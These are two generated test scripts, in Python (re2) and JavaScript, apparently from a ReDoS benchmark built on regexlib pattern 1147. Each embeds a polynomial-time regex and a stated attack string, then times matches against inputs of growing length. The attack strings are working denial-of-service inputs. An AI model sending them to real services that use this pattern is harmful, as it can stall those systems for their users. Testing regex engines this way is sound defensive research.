File: regexlib/python_re2_test_file/regexlib_1147.py
# 1147
# (?<Element>((\*|\w+)?)) (?<Complement>((\.|\#|\-|\w|\:)*)) (?<FamilySeparator>([\s\>\+\~]|[\,\{]))
# POLYNOMIAL
# nums:5
# POLYNOMIAL AttackString:" "+"0"*10000+"! _1!1 _◎@! _1!\n_SLQ_3"

import re2 as re
from time import perf_counter

regex = """(?<Element>((\*|\w+)?)) (?<Complement>((\.|\#|\-|\w|\:)*)) (?<FamilySeparator>([\s\>\+\~]|[\,\{]))"""
REGEX = re.compile(regex)
for i in range(0, 150000):
    ATTACK = " " + "0" * i * 10000 + "! _1!1 _◎@! _1!\n_SLQ_3"
    LEN = len(ATTACK)
    BEGIN = perf_counter()
    m = REGEX.search(ATTACK)
    # m = REGEX.match(ATTACK)
    DURATION = perf_counter() - BEGIN
    print(f"{i *10000}: took {DURATION} seconds!")

File: regexlib/2021-5-15/javascript_test_file/regexlib_1147.js
/* 1147
 * (?<Element>((\*|\w+)?)) (?<Complement>((\.|\#|\-|\w|\:)*)) (?<FamilySeparator>([\s\>\+\~]|[\,\{]))
 * POLYNOMIAL
 * nums:3
 * POLYNOMIAL AttackString:" "+"0"*10000+"! _1!1 _◎@! _1!\n_SLQ_3"
 */
var REGEX = /(?<Element>((\*|\w+)?)) (?<Complement>((\.|\#|\-|\w|\:)*)) (?<FamilySeparator>([\s\>\+\~]|[\,\{]))/
for(var i = 1; i <= 5000000; i++) {
    var time = Date.now();
    var attack_str = ' ' + '0'.repeat(i*10000) + '! _1!1 _◎@! _1!\n_SLQ_3'
    REGEX.exec(attack_str)
    // REGEX.test(attack_str);
    // attack_str.search(REGEX)
    // attack_str.match(REGEX)
    var time_cost = Date.now() - time;
    console.log(i * 10000 + ": " + time_cost+" ms")
}